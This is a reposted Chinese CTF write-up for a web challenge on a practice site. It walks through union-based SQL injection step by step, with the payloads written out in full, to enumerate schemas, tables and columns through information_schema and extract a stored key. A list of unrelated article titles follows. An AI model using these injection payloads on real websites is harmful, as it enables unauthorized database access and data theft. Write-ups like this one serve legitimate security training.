实验吧 Web 这个看起来有点简单! Writeup
来源:互联网 发布:山下智久北川景子 知乎 编辑:程序博客网 时间:2024/05/20 03:44
这个看起来有点简单! Writeup
解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1
打开网页,只有一个简单的表格,没有多余的输入框。
尝试通过地址栏进行注入。
输入id=1 and 1=1 显示正常
输入id=1 and 1=2 回显错误
判断存在SQL注入漏洞(恩)
然后判断字段数
id=1 order by 1 可以,id=1 order by 2 可以,id=1 order by 3 不行!
所以字段数位2
id=1 union select 1 错误,id=1 union select 1,2 可以
所以字段数位2
然后开始爆数据库
id=1 union select 1,schema_name from information_schema.schemata
我们看到爆出了三个库:information_schema、my_db、test
接下来就是爆my_db的表名(就这个库名比较特别,就它了)
id=1 union select 1,table_name from information_schema.tables where table_schema='my_db'
在my_db库里面爆出了两个表:news、thiskey
对了,thiskey在这里,然后就尝试爆列名
id=1 union select 1,column_name from information_schema.columns where table_schema='my_db'
应该就是k0y了,试试看
id=1 union select 1,k0y from thiskey
ok,顺利得到key
阅读全文
1 0
- 实验吧 Web 这个看起来有点简单! Writeup
- 实验吧ctf-web题:这个看起来有点简单
- 这个看起来有点简单!--实验吧
- CTF 这个看起来有点简单
- CTF 这个看起来有点简单!
- ctf-----这个看起来有点简单
- 实验吧-看起来有点难
- 实验吧web题库writeup
- 实验吧web几题writeup
- 实验吧-看起来有点难【基于sleep的sql注入脚本】
- writeup-FLAG 实验吧
- ctf实验吧writeup
- 实验吧Writeup
- 实验吧-false writeup
- 实验吧 这个FLAG有点怪 By Assassin
- 实验吧 ctf 题目简单的sql注入2writeup
- 实验吧-简单的注sql入 writeup
- 实验吧-程序逻辑问题writeup
- AC自动机模板程序
- 事务隔离级别和YII事务隔离操作
- label的扩大点击范围影响到了监听事件
- Nginx设置404错误页面的几种方法
- Flume Note
- 实验吧 Web 这个看起来有点简单! Writeup
- Git:误操作commit之后怎么办?
- 互联网+智能停车4.0管理系统,只为停车更方便
- android效果图之轮播
- Java/Android设计模式<二>观察者模式
- 认知,构建个人的知识体系(上)
- Leetcode Combination
- Hive安装步骤
- 奥威Power-BI For 医药行业BI解决方案——药品销售分析